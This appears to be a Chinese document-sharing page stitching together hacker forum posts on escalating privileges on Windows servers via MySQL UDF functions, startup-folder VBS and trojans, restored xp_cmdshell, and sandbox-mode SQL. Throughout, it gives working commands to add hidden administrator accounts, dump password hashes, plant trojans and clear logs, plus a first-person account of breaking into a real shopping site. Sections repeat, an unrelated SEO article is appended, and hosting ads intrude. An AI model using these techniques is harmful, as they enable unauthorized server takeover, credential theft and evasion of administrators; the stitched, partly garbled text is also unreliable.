关于mysql提权方法总结
mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用
最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps
主机、服务器租用的中国信息港在这里为你做深入探讨!
mysql提权总结方法四则
一 UDF提权
这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:
1 create function cmdshell returns string soname 'udf.dll'
2 select cmdshell('net user iis_user 123!@#abcABC /add');
3 select
cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an');
二 VBS启动项提权
1 create table a (cmd text);
2 insert into a values ("set
wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动
\\a.vbs";
先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项,
如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。
还可以这样写:
1 create table a (cmd BLOB);
2 insert into a values (CONVERT(木马的
16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a;
执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\
三 Linx Mysql BackDoor提权
Linx Mysql Door
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,
该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,
并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,
从而巧妙的实现了无端口,无进程,无服务的穿墙木马.
用法:将Mysql.php传到PHP服务器上,点击"自动安装Mysql BackDoor",然后直接执行命令即可
四,MIX.DLL提权
1 create table temp_mix(abc longblob);
2 insert into temp_mix
values(load_file('D:\\web\\udf.dll')); 3 select * from temp_mix into dumpfile 'C:\\Windows\\system32\\udf.dll'; 4 create function MyCmd returns string soname 'udf.dll'; 5 select MyCmd('net user'); 6 drop table if exists temp_mix;
前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。
而最容易出问题的就是第4句
can't open shared library 'udf.dll'(error 2);
就说下他.
先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数
首先百度了下.说得是:
1 drop function MyCmd;
就可以删到已经建立的函数.测试了下
发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG
可以执行如下语句:
1 delete from mysql.func where name='MyCmd';
测试了下成功了.前天再次盯着屏幕上的
can't open shared library 'udf.dll'
又看到了这条delete语句.我们知道delete就是删除.是删的表里的东西.删下表就可以删了函数了?
那反过来.建立函数是不是就是往表里插入一条新记录?而且是mysql.func.也就是mysql这个库里的func表.
呵呵.看名字也象.测试一番后.得出如下结果:
在提权的时候.建立函数显示
can't open shared library 'udf.dll'
就干脆跳过这句
执行另外一句.或者说.把第4句换成:
1 insert into mysql.func values('MyCmd',0,'udf.dll','function');
说下func这个表的结构:4 列.name,return,dl,fun.第二列和第四列的名字记不大清楚了
但意思一样.有兴趣可以自己
1 select * from func;
下就知道了
第一列就是新建函数的名字.字符串.第二列是返回值.填0.第三列dl指函数所在的dll名字.字符串类型
这里为我们导到系统目录里的dll名.不一定是udf.dll.只要跟你导出的一样就行.第四列作用不清楚
但是填上funciton这个字符串就能用.应该是指这个是个函数吧...因为这只是个插入操作
所以只要是root.应该不会有错误的.后面的就一样了.
1 select MyCmd('whoami');
但是别急!
这里有个前提:需要重启MYSQL..我对MYSQL不了解.但是重启后新建的函数绝对可用.貌似有别的办法可以达到同样的效果
好象是flush.但是具体flush哪里.就不知道了.不过不是权限.也不是func表.试过了.而且MYSQL下
搜了很久也没找到root在MYSQL下通过命令重启的.总有种感觉.不用重启的.
中国信息港专业域名注册,域名申请,域名查询,服务器托管,服务器租用,云主机,虚拟主机,vps主机,香港虚拟主机,企业邮箱,企业邮局,企业短信,邮箱域名,代理做账,公司代注 ,域名交易,网站建设,可信网站,网站推广,域名查询,
双线主机,美国主机,海外主机,虚拟主机提供商,微软SPLA认证运营商,虚拟主机管理,中文域名,中国域名,顶级域名注册,域名注册提供商,域名服务商,自定制主机,动态域名。
WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc
1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/182749718.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/182749718.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨! mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项, 如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values (CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\
. 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞,注入的关键字是关键字: inurl:Price.asp?anid=,结合系统本身的后台数据库备份生成目录可以自定义漏洞,轻松可以通过备份xxx.asp的目录,然后上传后缀为jpg的一句话木马,菜刀连之即可得到shell。 但是如果是这样我也不会再写此文,在这些购物网站中,数据最重要的当属减肥丰胸等等网站数据,而且这些网站在优化seo时,肯定设置的关键字也是减肥丰胸之类,那么中文标题之中必有此关键字,那我的想法就产生了,我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点,找到一个注入点https://www.doczj.com/doc/182749718.html,/Price.asp?anid=xxx,拿去跑表段字段即可,不过也得注意表段是特有的Cnhww。我一般在渗透的时候,也会用jsky和御剑检测站点,在我查看御剑的结果时发现了一个让我欣喜的结果https://www.doczj.com/doc/182749718.html,/shell.asp,明白的一看便知是先人后门,打开发现是一个小马, (原有小马一被我清除,此图是后来补的),复制大马代码保存,即得到shell。 扫描端口发现,网站开启了
连接3389端口发现可以连接, 尝试简单的命令猜解失败后,决定重新利用shell。查看服务器所支持的组件:
发现可以支持fso和wscript.shell,欣喜往外,ipconfig,net user都支持,查看了当前的账户,有一个默认的administrator管理账户。但是net user admin admin /add,没任何反应,net user 发现并没有添加账户成功,这里很纳闷,决定换思路。把网站翻了个遍,发现了一个数据库的链接文件。 通过代码可知,这里数据库使用了acess和mssql两个,mssql数据库连接账号和密码都已知晓,何不利用数据库连接器试一试,然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本,但皆以失败而告终,都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制,悲哀。。。 就在这个时候,忽然想起来,啊d等软件在mssql数据库sa权限下,皆有列目录和执行dos的权限,何不试试,然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add,但是好久都没回显,很卡的样子,就又换了hdsi,一举成功。 注意这里建立admin是为了方便检测新否已经建立账户,要做一个好的后门,是要做克隆账户的。心情愉悦的3389连之,为了防止管理员net user查到新建的账户,我建立了隐藏账户,即是admin$,这种账户在cmd中时发现不了的,但是查询用户组还是一览无遗。我当时没在意觉得没什么,然后速度在日志查看器中删除了所有日志,(这个我也不想,不过好似没法删除单一的登陆记录,请大牛指点指点),正在这时,忽然事件查看器中多了一条登录审核信息,我一看管理员来了,吓得我急忙注销电脑,灰溜溜的跑了。。。。 大约过了1个小时吧,我又重新登录,账号还在,管理员确实很马虎额,不过自己可不能再大意了,遂决定建立克隆账户。 然后就用shell上传aio.exe文件,竟然失败,然后用菜刀上传也是失败,真是无语。看来是权限不够,忽然想到3389现在不是支持复制粘贴吗?忽然觉得思路就是被逼出来的,
### 提权技巧 1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是https://www.doczj.com/doc/182749718.html, cmd.txt cmd.rar等 https://www.doczj.com/doc/182749718.html, user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia /add 4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txt cmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下 也可以用mimikatz直接抓明文 5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了 6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输 入替换的文件路径,下面清空双引号加增加用户的命令 7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名 了,使用命令net user administrator查看管理组的名字 8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变 9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后 用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功 10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe 11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录, 接着上传iispwd.vbs到网站根目录,cmd命令cmd /c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs 11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x 12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add
轻轻松松随时调用Administrator账户,不再困扰于Windows7下没有权限先给大家看看效果图!(文件在开始菜单中,想什么时候调用就什么时候用!) 下面就告诉大家是怎么做到的! 首先,打开电脑上的文件夹选项,显示文件的后缀名。将“隐藏已知文件类型的扩展名”前的“√”去掉。确定。
第二步:新建一个记事本文档,改名“调用Administrator账户.bat”(注意一定将“.txt”改为“.bat”) 将以下内容复制至记事本。 @echo off title "调用Administrator(超级管理员)账户" color 1F echo. echo 即将调用您电脑上的“Administrator”账户,否则请关闭本窗口。 echo. pause echo. set /p start= 请输入Y (继续调用)或N (退出调用): echo. if /I "%start%"=="Y" goto start if /I "%start%"=="N" goto exit goto exit :start cls echo. echo 正在调用您电脑上的“Administrator”账户,请稍等…… echo. echo 调用说明:1.打开“用户”文件夹 echo. echo 2.双击“Administrator”账户,去掉“账户已禁用”前的“√” ,确定后退出,点击开始菜单,选择“切换账户”即可见到“Administrator”即 超级管理员账户。 echo. echo. echo ******************************************************************* echo ******************** 谢谢使用,祝您使用愉快!********************* echo ******************************************************************* lusrmgr.msc :exit exit 截止到上面最后一行文字即可。然后保存文件。 最后,在开始菜单“所有程序”上点击鼠标右键,选择“打开” 将刚做好的bat文件拷贝至刚打开的文件夹的“程序”文件夹中即可。 具体使用方法在打开的窗口中有讲诉。(运行后输入“Y或“N”后按下回车键即可。)
net net1被禁止时执行CMD命令 第一步:dir net.exe /s /p 或者 dir net1.exe /s /p 第二步:C:\WINDOWS\system32\dllcache\net1.exe user 123 123 /add 第三步:C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators 123 /add ◆◆◆◆◆◆◆◆◆◆◆◆◆◆ 沙盘模式提权 sethc.exe禁止 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\i as\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F') net net1都被禁用 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\i as\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")') 如果cmd被禁用 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\i as\ias.mdb','select shell("net user user pass /add")') ◆◆◆◆◆◆◆◆◆◆◆◆◆◆ 除了xplog70.dll其他的都可以用这命令修复 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 服务器: 消息 3701,级别 11,状态 5,行 1 无法除去过程 'sp_addextendedproc',因为它在系统目录中不存在。 服务器: 消息 3701,级别 11,状态 5,过程 sp_dropextendedproc,行 18 无法除去过程 'xp_cmdshell',因为它在系统目录中不存在。 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 ◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题,对webshell的提权方法! 首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起: 1.pcanywhere的提权方法 pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。 2.Serv-U提权方法 Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧! a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录: c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\Documents\ 很多时候data目录不行,试试这个很多主机都是erveryone 完全控制! C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP)
最全的WEBSHELL提权方法总结 在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用 WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RA V\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM :( 错 CAcls命令
1433提权详解!!! 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/182749718.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
对服务器进行提权的方法 文章录入:责任编辑: 84 【字体:小大】 现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题,对webshell的提权方法! 首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起: 的提权方法 pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere 密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。
百度快速提权优化方法杀手锏---Moon老师 SEO研究中心的支持者提供学习笔记摘要: 在没有任何优势的前提下,我们该怎样突出自己? 那么就需要做差异化了,因为在同行的后面再继续使用常规的手法,很难操作到排名,所以我们需要做到人无我有,人有我优。 首先我们要针对行业找出差异化,针对同行做出差异化要点。 如 雷霆战机破解版: 我们通过现有的排名,我们能得到什么? 排名第三的为最新相关信息 为什么该关键词会出现最新相关信息呢? 是有需求的吗?不对的,因为搜索关键词的用户主要需求是下载。 那为什么百度会给予最新信息排名呢? 因为当需求满足到一定时,那么百度就会给予最新信息排名。因为百度会在网站更新数据,更新版本后,可以给予用户相关提示,从而也会给予网站权重值。 从而也给予我们用户需要最新文章的相关信息,但是我们通过搜索没有看到用户对此有需求。这就是百度的算法,百度根据网站的是否满足了百度的算法,因为百度会基于它的算法,来分析网站是否满足了,从而给予网站排名权重。 优化过程中我们要避免随波逐流,避免跟随同行的优化手法及方向继续做下去。 因为同行在该方向已经占有了绝大的优势,倘若我们继续模仿做下去,那么我们只能是在他身后俯首称臣了。 所以我们要懂得分析,学会分析。做差异化,以差异化为切入点,彻彻底底独立形成自己的优势,从而以过硬的基础操作让网站得到较好的排名。 天天酷跑破解版下载: 我们可以看到排到第一的又是最新相关信息 说明了百度会抓取游戏行业最新的相关信息,会给予较高的权重。 那么如果我们更新了这些信息,会给我们带来什么呢? 如果百度会抓取这些信息,然而我们又更新了游戏最新的相关信息,百度会不会给予网站较高的权重值呢?答案是肯定的。因为我们复合了百度的算法。 通过以上分析可以得出:当百度分析出行业的这个需求在上升,而行业中该需求相关信息在下降时,在这时我们提供了该需求的最新相关信息,百度就会给我们权重给我们排名。
